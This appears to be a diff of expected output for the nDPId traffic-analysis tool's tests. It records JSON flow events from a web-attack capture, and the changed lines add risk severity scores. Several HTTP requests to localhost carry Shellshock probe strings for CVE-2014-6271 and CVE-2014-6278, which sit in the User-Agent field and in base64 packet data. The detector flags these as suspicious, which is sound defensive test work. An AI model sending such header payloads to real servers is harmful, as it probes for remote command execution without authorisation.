-00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/loadpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01161{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":466,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277423,"flow_last_seen":1576420277423,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"ts_msec":1576420277423,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50494,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/loadpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1576420277425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"ts_msec":1576420277425,"pkt":"AAAAAAAAAAAAAAAACABFAAEKJkVAAEAGFad\/AAABfwAAAcVAH5DPeB6QOQhEGoAYAED+\/gAAAQEICp1m\/didZv3YR0VUIC9sb2dpbi5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":467,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277425,"flow_last_seen":1576420277425,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277425,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50496,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1576420277426,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"ts_msec":1576420277426,"pkt":"AAAAAAAAAAAAAAAACABFAAEKG0lAAEAGIKN\/AAABfwAAAcVCH5Dr2SOM+8VpkIAYAED+\/gAAAQEICp1m\/dqdZv3aR0VUIC9sb2dpbi5waHAgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="}
-00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01158{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":468,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277426,"flow_last_seen":1576420277426,"flow_idle_time":7440000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":1,"ts_msec":1576420277426,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50498,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1576420277428,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":279,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":279,"pkt_l4_len":245,"ts_msec":1576420277428,"pkt":"AAAAAAAAAAAAAAAACABFAAEJsHVAAEAGi3d\/AAABfwAAAcVEH5DgV4i\/xF\/y64AYAED+\/QAAAQEICp1m\/dydZv3cR0VUIC9sb2dpbi5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCg0K"}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277428,"flow_last_seen":1576420277428,"flow_idle_time":7440000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":213,"midstream":1,"ts_msec":1576420277428,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50500,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1576420277429,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"ts_msec":1576420277429,"pkt":"AAAAAAAAAAAAAAAACABFAAEMTIBAAEAG72l\/AAABfwAAAcVGH5AiwXS0u+SpZoAYAED\/AAAAAQEICp1m\/d2dZv3dR0VUIC9wYXRodGVzdC5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"}
-00890{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pathtest.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":470,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277429,"flow_last_seen":1576420277429,"flow_idle_time":7440000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"flow_avg_l4_payload_len":216,"midstream":1,"ts_msec":1576420277429,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50502,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pathtest.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7440000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1576420277431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"ts_msec":1576420277431,"pkt":"AAAAAAAAAAAAAAAACABFAAEE5XFAAEAGVoB\/AAABfwAAAcVIH5CqQt2jzObFZYAYAED++AAAAQEICp1m\/d+dZv3eR0VUIC9waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7440000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01152{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":471,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277431,"flow_last_seen":1576420277431,"flow_idle_time":7440000,"flow_min_l4_payload_len":208,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":208,"midstream":1,"ts_msec":1576420277431,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50504,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1576420277432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"ts_msec":1576420277432,"pkt":"AAAAAAAAAAAAAAAACABFAAEFeJtAAEAGw1V\/AAABfwAAAcVKH5AUwUBY1pIiyIAYAED++QAAAQEICp1m\/eCdZv3gR0VUIC9waHA0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KDQo="}
-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php4","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":472,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277432,"flow_last_seen":1576420277432,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1576420277432,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50506,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php4","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1576420277433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"ts_msec":1576420277433,"pkt":"AAAAAAAAAAAAAAAACABFAAEFSMVAAEAG8yt\/AAABfwAAAcVMH5DeS3AOoHbKrYAYAED++QAAAQEICp1m\/eGdZv3hR0VUIC9waHA1IEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","11":"HTTP Suspicious User-Agent","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php5","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
+01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":473,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277433,"flow_last_seen":1576420277433,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"ts_msec":1576420277433,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50508,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/php5","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
